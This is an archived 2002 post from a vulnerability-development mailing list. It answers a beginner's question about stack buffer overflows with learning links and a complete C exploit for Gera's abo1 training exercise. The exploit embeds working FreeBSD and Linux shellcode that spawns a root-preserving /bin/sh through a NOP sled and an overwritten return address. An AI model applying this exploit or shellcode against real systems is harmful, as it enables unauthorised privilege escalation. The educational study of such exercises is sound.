Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Assembler/C References

From: Claes Nyberg <md0claes () mdstud chalmers se>
Date: Wed, 17 Jul 2002 00:23:37 +0200 (MET DST)

You need to know what the execution flow of the program you want to exploit
look like. In order to "see" this, you need to know how memory and the CPU
works on the target architecture.

My advice is that you write a program in C, and convert each routine into
assembly when it is finished. This way you learn enough to understand
smashing the stack for fun and profit, which will guide you through the
shellcode and buffer overflow exploit process.

C links:
http://www.cee.hw.ac.uk/~rjp/Coursewww/Cwww/index.html
http://www.erlenstar.demon.co.uk/unix/faq_toc.html
http://users.actcom.co.il/~choo/lupg/tutorials/
http://www.whitefang.com/sup/secure-faq.html
http://www.developerweb.net/sock-faq/

Assembly links:
http://webster.cs.ucr.edu/Page_AoALinux/aoa.pdf.gz
http://webster.cs.ucr.edu/
http://linuxassembly.org/
http://lsd-pl.net/documents/asmcodes-1.0.2.pdf
http://segfault.net/~scut/cpu/

// CMN

-- Begin abo1x.c --

/*
 * Solution to
 * http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
 *
 * Claes M. Nyberg  <md0claes () mdstud chalmers se>
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

/* buf + 4 = ret */
#define BUFFSIZE            (256+8)
#define NOP                 0x90

#define FBSD_PROG           "./abo1-fbsd"
#define LINUX_PROG          "./abo1-linux"

#define FREEBSD_OFFSET      480
#define LINUX_OFFSET        400

/*
 * FreeBSD shellcode - execv /bin/sh
 */
static char fbsdcode[] =
    "\x31\xc0"               /* xorl    %eax, %eax  */
    "\x50"                   /* pushl   %eax        */
    "\x68\x2f\x2f\x73\x68"   /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e"   /* pushl   $0x6e69622f */
    "\x89\xe3"               /* movl    %esp, %ebx  */
    "\x50"                   /* pushl   %eax        */
    "\x53"                   /* pushl   %ebx        */
    "\x89\xe2"               /* movl    %esp, %edx  */
    "\x50"                   /* pushl   %eax        */
    "\x52"                   /* pushl   %edx        */
    "\x53"                   /* pushl   %ebx        */
    "\x50"                   /* pushl   %eax        */
    "\xb0\x3b"               /* movb    $0x3b, %al  */
    "\xcd\x80"               /* int     $0x80       */
    "\x31\xc0"               /* xorl    %eax, %eax  */
    "\x40"                   /* inc     %eax        */
    "\x50"                   /* pushl   %eax        */
    "\x50"                   /* pushl   %eax        */
    "\xcd\x80";              /* int     $0x80       */

/*
 * Linux shellcode
 * setreuid(geteuid()),setregid(getegid()), execv /bin/sh
 */
static char linuxcode[] =
    "\xb9\xff\xff\xff\xff" /* movl    $-1, %ecx   */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x31"             /* movb    $0x31, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x46"             /* movb    $0x46, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x32"             /* movb    $0x32, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x47"             /* movb    $0x47, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xd2"             /* xorl    %edx, %edx  */
    "\x52"                 /* pushl   %edx        */
    "\x68\x2f\x2f\x73\x68" /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl   $0x6e69622f */
    "\x89\xe3"             /* movl    %esp, %ebx  */
    "\x52"                 /* pushl   %edx        */
    "\x53"                 /* pushl   %ebx        */
    "\x89\xe1"             /* movl    %esp, %ecx  */
    "\xb0\x0b"             /* movb    $0xb, %al   */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\x40"                 /* inc     %eax        */
    "\xcd\x80";            /* int     $0x80       */

u_long
get_esp(void)
{
    asm("movl %esp, %eax");
}

int
main(int argc, char *argv[])
{
    u_char buf[BUFFSIZE+1];
    u_char *code;
    u_char *prog;
    u_long addr;

    addr = get_esp() + 20 + BUFFSIZE;

    if (argc < 2) {
        printf("Usage: %s <linux | freebsd> [offset]\n", argv[0]);
        exit(1);
    }
    else if (!strncmp(argv[1], "linux")) {
        code = linuxcode;
        prog = LINUX_PROG;
        addr -= LINUX_OFFSET;
    }
    else if (!strncmp(argv[1], "freebsd")) {
        code = fbsdcode;
        prog = FBSD_PROG;
        addr -= FREEBSD_OFFSET;
    }
    else
        exit(1);

    if (argv[2])
        addr = get_esp() + 20 + BUFFSIZE - strtoul(argv[2], NULL, 0);

    /* Set NOP's */
    memset(buf, NOP, BUFFSIZE);

    /* Copy shellcode */
    memcpy(&buf[BUFFSIZE - strlen(code) -30], code, strlen(code));

    /* Set return address */
    *((u_long *)&buf[260]) = addr;
    buf[BUFFSIZE] = '\0';

    fprintf(stderr, "Using address 0x%2x\n", *((u_long *)&buf[260]));
    execlp(prog, prog, buf, NULL);
    exit(1);
}

-- End abo1x.c --

------------------------------------------------------------------------------
Home: http://www.mdstud.chalmers.se/~md0claes/
------------------------------------------------------------------------------
Citation :
The number of UNIX installations has grown to 10, with more expected.
_The UNIX Programmer's Manual_, Second Edition, June, 1972
------------------------------------------------------------------------------


On Tue, 16 Jul 2002, Jeremy Junginger wrote:


Hey guys,
Thanks for all of the great feedback about assembler and c.  I was
playing with the code at:
http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
(Thanks for the link, Claes)
And if it is run, it produces a segmentation fault.  After running gdb
against the program, I obtain the following data:

[rewt@n00bB0x]# gdb abo1

Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disass main
Dump of assembler code for function main:
0x8048460 <main>:       push   %ebp
0x8048461 <main+1>:     mov    %esp,%ebp
0x8048463 <main+3>:     sub    $0x108,%esp
0x8048469 <main+9>:     sub    $0x8,%esp
0x804846c <main+12>:    mov    0xc(%ebp),%eax
0x804846f <main+15>:    add    $0x4,%eax
0x8048472 <main+18>:    pushl  (%eax)
0x8048474 <main+20>:    lea    0xfffffef8(%ebp),%eax
0x804847a <main+26>:    push   %eax
0x804847b <main+27>:    call   0x804834c <strcpy>
0x8048480 <main+32>:    add    $0x10,%esp
0x8048483 <main+35>:    leave
0x8048484 <main+36>:    ret
0x8048485 <main+37>:    lea    0x0(%esi),%esi
0x8048488 <main+40>:    nop
0x8048489 <main+41>:    nop
0x804848a <main+42>:    nop
0x804848b <main+43>:    nop
0x804848c <main+44>:    nop
0x804848d <main+45>:    nop
0x804848e <main+46>:    nop
0x804848f <main+47>:    nop
End of assembler dump.
(gdb) quit

[rewt@n00bB0x]#

I guess I don't really know where to go from here.  I see that the
buffer has space form 256 bytes.  Okay, so I run ./abo1 AAAAAAAA(256
times) and it runs okay, then when I run ./abo1 with AAAA(more than
256X) it returns with a segmentation fault.  The part I'm not
understanding is, after I've overflowed the buffer, how do I know where
the next bytes will be stored?  Will they be stored at the next memory
address (in this case 0x8048480)?  Once you know where they are stored,
how can you append your code, do you just do a
AAAAAA(howevermanytimesyouneedit) and then append your code to the end
of it?

Thanks for fielding these beginner questions.  They're embarrassing to
ask, but everyone's gotta start somewhere.

-Jeremy
Previous By Date Next
Previous By Thread Next

Current thread: